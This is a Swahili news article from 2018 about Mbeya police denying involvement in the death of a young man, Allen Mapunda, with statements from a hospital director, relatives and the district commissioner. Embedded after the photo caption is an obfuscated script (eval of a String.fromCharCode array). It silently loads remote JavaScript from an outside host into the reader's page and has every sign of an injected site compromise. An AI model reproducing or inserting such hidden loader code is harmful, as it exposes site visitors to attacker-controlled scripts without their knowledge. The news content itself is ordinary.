Recent Comments

Jeshi la Polisi Mbeya lakana kuhusika na mauaji ya kijana Allen

By Steven Salim Mar 27, 2018
<p>Mohammed Mpinga - Kamanda wa Polisi Mkoa wa Mbeya</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na Steven Samwel – Mbeya.

Jeshi la Polisi mkoani Mbeya limekana kuhusika na kifo cha Kijana Allen Mapunda, ikiwa ni siku mbili baada ya kutokea vurugu zilizofanywa na wakazi wa Mtaa wa Iyela II jijini Mbeya ambao walikuwa wakipinga kifo chenye utata cha kijana huyo.

Akizungumza na Wandishi wa Habari, Kamanda wa Polisi Mkoa wa Mbeya, Mohammed Mpinga, amesema Jeshi hilo halihusiki kwa sababu kijana huyo alitoka mikononi mwa Jeshi hilo na kuondoka na ndugu zake baada ya kudhaminiwa akiwa salama.

Akitoa taarifa ya chanzo cha kifo hicho, Mkurugenzi wa Hospitali ya Kanda ya Rufaa ya Mbeya, Dk. Godlove Mbwanji, amesema kijana huyo amefariki muda mfupi baada ya kufikishwa hospitalini hapo na kueleza kuwa taarifa zilizoandikwa kwenye kitabu cha taarifa za wagonjwa cha hospitali hiyo, zinaonyesha kuwa alikuwa amepigwa na kuumia ndani kwa ndani.

Kwa upande wake, mama mlezi wa marehemu Bi. Alice Mapunda, amesema wakati wanamchukua kijana wao hospitalini alikuwa analalamika kuwa anajisikia maumivu makali sehemu za tumbo huku akiwa na majeraha mikononi na kichwani, huku mama mdogo wa marehemu Bi. Justina Kilasa akidai kuwa kijana huyo hakuwa mzurulaji kama inavyodaiwa na Jeshi la polisi na badala yake alikuwa anafanya biashara zake za machungwa na jioni kwenda kanisani.

Hata hivyo, Mwenyekiti wa Kamati ya Ulinzi na Usalama ya Wilaya ya Mbeya ambaye pia ni Mkuu wa Wilaya hiyo, William Ntinika, akiongozana na baadhi wa wajumbe wa Kamati hiyo, wamefika nyumbani kwa wazazi wa marehemu na kuwapa pole wanandugu.

Ntinika alitoa rambirambi ya shilingi 200,000 na kuahidi kuwa Serikali itagharimia mazishi ya kijana huyo ikiwa ni pamoja na kukodi gari la matangazo pamoja na chakula. Vilevile amesema wameshakubaliana na ndugu wa marehemu mazishi yafanyike kesho baada ya taratibu za kisheria kukamilika.